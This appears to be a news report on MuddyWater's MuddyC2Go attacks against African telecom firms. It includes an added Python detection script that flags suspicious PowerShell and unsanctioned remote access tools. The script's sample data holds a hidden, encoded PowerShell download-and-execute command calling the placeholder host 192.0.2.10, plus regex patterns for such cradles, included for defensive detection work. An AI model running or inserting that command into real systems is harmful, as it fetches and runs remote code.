The Iranian nation-state actor known as MuddyWater has been observed using a newly discovered command-and-control (C2) framework called MuddyC2Go in attacks targeting the telecommunications sector in Egypt, Sudan, and Tanzania.
Symantec's Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, a group also known by the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and others.
MuddyWater is assessed to have been active since at least 2017, to be affiliated with Iran's Ministry of Intelligence and Security (MOIS), and to primarily target entities in the Middle East.
Deep Instinct first highlighted the cyber espionage group’s use of MuddyC2Go last month, describing it as a Golang-based alternative to PhonyC2, itself a successor to MuddyC3. However, there is evidence that it may have been adopted as early as 2020.
While the full functionality of MuddyC2Go is unknown, the executable is equipped with a PowerShell script that automatically connects to Seedworm’s C2 server, allowing the attacker to remotely access victim systems without requiring manual execution by the operator.
The latest set of intrusions occurred in November 2023 and was also found to rely on SimpleHelp and Venom Proxy, as well as custom keyloggers and other publicly available tools.
The group's attack chains have a track record of using phishing emails and known vulnerabilities in unpatched applications to gain initial access, followed by reconnaissance, lateral movement, and data collection.
In the attacks against unnamed telecom organizations documented by Symantec, the MuddyC2Go launcher was executed to establish contact with attacker-controlled servers, and legitimate remote access software such as AnyDesk and SimpleHelp was also deployed.
The same entity is said to have been compromised by the adversary earlier in 2023, when SimpleHelp was used to launch PowerShell, deliver agent software, and install the JumpCloud remote access tool.
“At another telecommunications and media company targeted by the attackers, SimpleHelp was used multiple times to connect to known Seedworm infrastructure,” Symantec noted. “A customized build of the Venom Proxy hacking tool was also executed on the network, as well as a new custom keylogger used by the attackers in this campaign.”
The company said that by combining customized, living-off-the-land, and publicly available tools in its attack chains, the group aims to evade detection for as long as possible in order to achieve its strategic objectives.
“The group will continue to innovate and develop its toolset as needed to keep its activities out of the spotlight,” Symantec concluded. “The group continues to make heavy use of PowerShell and PowerShell-related tools and scripts, which highlights the need for organizations to be aware of suspicious use of PowerShell on their networks.”
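As an added illustration of that detection advice (this is example code written for this page, not tooling from Symantec or from the report), the following Python script triages constructed process-creation records for the two behaviours the intrusions above describe: PowerShell launched by a remote access tool with hidden, encoded, download-cradle arguments, and remote access tools that are not sanctioned in the environment. The executable names assumed for SimpleHelp and JumpCloud, the allowlist, the hostnames, and the 192.0.2.10 address are all assumptions made for the example.

```python
import base64
import re

# Added example (not code from Symantec or the article): a small triage pass
# over constructed process-creation records, flagging suspicious PowerShell
# invocations and remote access tools not sanctioned for the environment.

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Remote access tools named in the article, keyed by an assumed executable
# name. Real binary names and which tools are approved differ per
# organisation; these values are assumptions for the example.
REMOTE_ACCESS_TOOLS = {
    "anydesk.exe": "AnyDesk",
    "remote access.exe": "SimpleHelp",
    "jumpcloud-agent.exe": "JumpCloud",
}
SANCTIONED_TOOLS = {"AnyDesk"}  # assumption: only AnyDesk is approved here

# Command-line switches commonly paired with malicious PowerShell use.
SUSPICIOUS_SWITCHES = [
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "no profile"),
]
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|\biex\b|invoke-expression",
    re.I,
)


def decode_encoded_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if absent or invalid.
    PowerShell expects base64 over UTF-16LE text, so both layers are checked."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command_line, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return the list of rule labels tripped by one process-creation record."""
    image = _basename(event["image"])
    parent = _basename(event["parent_image"])
    cmd = event["command_line"]
    findings = []

    tool = REMOTE_ACCESS_TOOLS.get(image)
    if tool and tool not in SANCTIONED_TOOLS:
        findings.append(f"unsanctioned remote access tool: {tool}")

    if image in POWERSHELL_IMAGES:
        parent_tool = REMOTE_ACCESS_TOOLS.get(parent)
        if parent_tool:
            findings.append(f"PowerShell spawned by {parent_tool}")
        for pattern, label in SUSPICIOUS_SWITCHES:
            if pattern.search(cmd):
                findings.append(label)
        decoded = decode_encoded_command(cmd)
        # Scan the decoded script too: the cradle is normally hidden in there.
        haystack = cmd if decoded is None else cmd + "\n" + decoded
        if DOWNLOAD_CRADLE.search(haystack):
            findings.append("download cradle")
    return findings


def analyze_events(events):
    """Return one {host, image, findings} entry per event that tripped a rule."""
    results = []
    for ev in events:
        findings = analyze_event(ev)
        if findings:
            results.append({"host": ev["host"], "image": ev["image"], "findings": findings})
    return results


# Constructed sample records (Sysmon Event ID 1 style fields); hosts, paths
# and the 192.0.2.10 address are made up for the example.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage1')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # ordinary interactive use by an admin: should not fire
        "host": "ws01",
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -NoLogo",
    },
    {   # remote access tool launching hidden, encoded PowerShell with a download cradle
        "host": "srv-billing02",
        "parent_image": r"C:\Program Files\SimpleHelp\Remote Access.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED_STAGER}",
    },
    {   # sanctioned tool: should not fire
        "host": "ws01",
        "parent_image": r"C:\Windows\System32\services.exe",
        "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
        "command_line": '"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe" --service',
    },
    {   # tool not on the allowlist
        "host": "srv-billing02",
        "parent_image": r"C:\Windows\System32\services.exe",
        "image": r"C:\Program Files\JumpCloud\jumpcloud-agent.exe",
        "command_line": '"C:\\Program Files\\JumpCloud\\jumpcloud-agent.exe"',
    },
]

if __name__ == "__main__":
    for hit in analyze_events(SAMPLE_EVENTS):
        print(f"{hit['host']}: {hit['image']}")
        for label in hit["findings"]:
            print(f"    - {label}")
```

In a real deployment the records would come from Sysmon Event ID 1, Security Event ID 4688, or PowerShell script block logs (Event ID 4104) rather than constructed dictionaries. Decoding -EncodedCommand before pattern matching matters because the download cradle never appears in the raw command line, and the parent-process check is what ties the PowerShell activity back to the remote access tool the report describes.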
The development comes as an Israel-linked group called Gonjeshke Darande (meaning “predatory sparrow” in Persian) claimed a cyberattack that, launched in response to “aggression by the Islamic Republic and its proxies in the region,” damaged “most of the gas stations in Iran.”
The group resurfaced in October 2023 after nearly a year of silence and is believed to be linked to Israel’s military intelligence service and has launched destructive attacks in Iran, including on the country’s steel facilities, gas stations and railway networks.
The cyberattack also came amid an advisory issued by Israel’s National Cyber Directorate (INCD), which accused Iran and the pro-Hamas group Hezbollah of unsuccessful attempts to disrupt Ziv Hospital and attributed the attack to the threat actors known as Agrius and Lebanese Cedar.
“The attack was carried out by Iran’s Intelligence Ministry and also involved the ‘Lebanese Cedar’ cyber force led by Hezbollah’s Mohammad Ali Merhi,” the INCD said.